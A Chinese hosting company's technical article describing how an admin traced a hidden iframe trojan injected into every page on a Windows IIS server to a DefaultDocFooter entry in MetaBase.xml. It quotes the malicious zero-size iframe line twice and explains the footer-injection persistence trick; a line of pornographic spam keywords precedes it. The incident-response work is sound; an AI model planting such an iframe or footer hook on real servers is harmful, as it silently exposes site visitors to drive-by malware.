亚洲韩日午夜视频,欧美日韩在线精品一区二区三区,韩国超清无码一区二区三区,亚洲国产成人影院播放,久草新在线,在线看片AV色

您好,歡迎來到思海網絡,我們將竭誠為您提供優質的服務! 誠征網絡推廣 | 網站備案 | 幫助中心 | 軟件下載 | 購買流程 | 付款方式 | 聯系我們 [ 會員登錄/注冊 ]
促銷推廣
客服中心
業務咨詢
有事點擊這里…  531199185
有事點擊這里…  61352289
點擊這里給我發消息  81721488
有事點擊這里…  376585780
有事點擊這里…  872642803
有事點擊這里…  459248018
有事點擊這里…  61352288
有事點擊這里…  380791050
技術支持
有事點擊這里…  714236853
有事點擊這里…  719304487
有事點擊這里…  1208894568
有事點擊這里…  61352289
在線客服
有事點擊這里…  531199185
有事點擊這里…  61352288
有事點擊這里…  983054746
有事點擊這里…  893984210
當前位置:首頁 >> 技術文章 >> 文章瀏覽
技術文章

Windows服務器下查IIS被掛iframe木馬

添加時間:2011-2-22  添加: admin 

一臺服務器 幾乎所有網站打開網頁 甚至HTML網頁 都出現了

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

這種樣式的代碼 有的在頭部 有的在尾部 部分殺毒軟件打開會報毒

打開HTML或ASP PHP頁面 在源碼中怎么也找不到這段代碼

分析原因

首先懷疑ARP掛馬,用防ARP的工具又沒有發現有arp欺騙

而且arp欺騙一般不會每次都被插入代碼,而是時有時無

而且使用http://127.0.0.1 或者http://localhost 訪問的時候也可以找到這段代碼

arp欺騙的可能排除。

然后就想到可能是JS被篡改,或者是其它的包含文件,查找后沒有發現被改的頁面 連新建的HTML頁面瀏覽的時候也會被插入這段代碼,那就只能是通過IIS掛上去的了。

備份iis數據然后重裝iis,代碼消失,將備份的iis恢復,問題又來了。

仔細尋找,問題應該出在IIS的配置文件上,打開配置文件,沒有發現那段代碼。

那很有可能是調用了某個文件,這個怎么查啊,忽然想起了大名鼎鼎的Filemon

本地載了一個上傳到服務器上,打開Filemon,數據太多了,過濾掉一些沒有用的

只留下iis的進程,數據還是很多,看來服務器上的站點還是挺多人在訪問的。

關掉所有站點,建了一個測試站點anky 目錄為D:\www\ 在下面建了一個空白頁面test.htm

訪問一下這個頁面代碼被插進來了,再看一下Filemon 奇怪怎么讀取C:\Inetpub\wwwroot\iisstart.htm

打開C:\Inetpub\wwwroot\iisstart.htm一看,里面就躺著

<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>

把代碼刪除了留空,訪問test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm刪除了再訪問

test.htm 出現 “讀取數據頁腳文件出錯”問題就出這里了,看來是調用了

這個文件。

把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,這樣怎么行,解決問題當然要連根拔掉。

continue

有沒有可能是擴展造成的,到擴展中檢查了一遍全部都是正常的

當然 通過ISAPI 掛馬的也是存在的

左想右想最后還是覺得配置文件有問題

打開配置文件,配置文件在%windir%\system32\inetsrv\MetaBase.xml

用記事本打開,查找iisstart.htm 找到一行,開始以為是默認站點,后來一想不對啊

默認站點都刪除了,再仔細一看這句代碼為

DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"

刪除掉這一行,問題徹底解決了。
關鍵詞: windows 服務器 IIS 木馬

分享到:

頂部 】 【 關閉
版權所有:佛山思海電腦網絡有限公司 ©1998-2024 All Rights Reserved.
聯系電話:(0757)22630313、22633833
中華人民共和國增值電信業務經營許可證: 粵B1.B2-20030321 備案號:粵B2-20030321-1
網站公安備案編號:44060602000007 交互式欄目專項備案編號:200303DD003  
察察 工商 網安 舉報有獎  警警  手機打開網站